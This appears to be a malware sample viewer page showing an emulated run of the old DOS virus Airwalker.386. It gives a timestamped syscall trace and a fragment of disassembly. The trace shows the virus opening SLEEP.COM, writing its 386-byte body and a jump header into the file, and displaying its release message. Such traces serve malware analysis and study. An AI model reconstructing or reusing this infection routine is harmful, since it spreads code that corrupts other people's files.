Sample viewer

vx.netlux.org/Virus.DOS.Airwalker.386

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:19:44.534144889Z 26 PC: 12ab3 | Set disk transfer address
2018-12-17T22:19:44.536643995Z 78 PC: 12abf | Find first file
2018-12-17T22:19:44.542545276Z 61 PC: 12afe | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:19:44.548840752Z 63 PC: 12b0c | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:19:44.555234879Z 66 PC: 12b1f | Move file pointer
2018-12-17T22:19:44.55680089Z 44 PC: 12b2c | Get time 0x12b2c: xchg cl, ch
0x12b2e: add dx, cx
0x12b30: mov word ptr [bp + 0x172], dx
0x12b34: xor word ptr [bp + 0x15d], 0x1717
0x12b3a: xor byte ptr [bp + 0x15f], 0x19
0x12b3f: mov ah, 0x40
0x12b41: mov cx, 0x182
0x12b44: lea dx, word ptr [bp]
0x12b47: pushaw
0x12b48: jmp 0x12bfa
0x12b4b: pop ax
0x12b4c: jb 0x12b77
0x12b4e: sub ax, 3
0x12b51: push bx
0x12b52: mov bx, bp
0x12b54: mov word ptr cs:[bx + 1], ax
0x12b58: mov byte ptr [bx], 0xe9
0x12b5b: pop bx
0x12b5c: mov ax, 0x4200
0x12b5f: xor cx, cx
2018-12-17T22:19:44.55912979Z 64 PC: 12c00 | Write file or device (Write 386 bytes on handle 5)
2018-12-17T22:19:44.572531408Z 66 PC: 12b64 | Move file pointer
2018-12-17T22:19:44.573835903Z 64 PC: 12b71 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:19:44.580040616Z 62 PC: 12b77 | Close file
2018-12-17T22:19:44.5878074Z 9 PC: 12a47 | Display string (String= 'WARNING: You have just released the Airwalker.386 virus! ')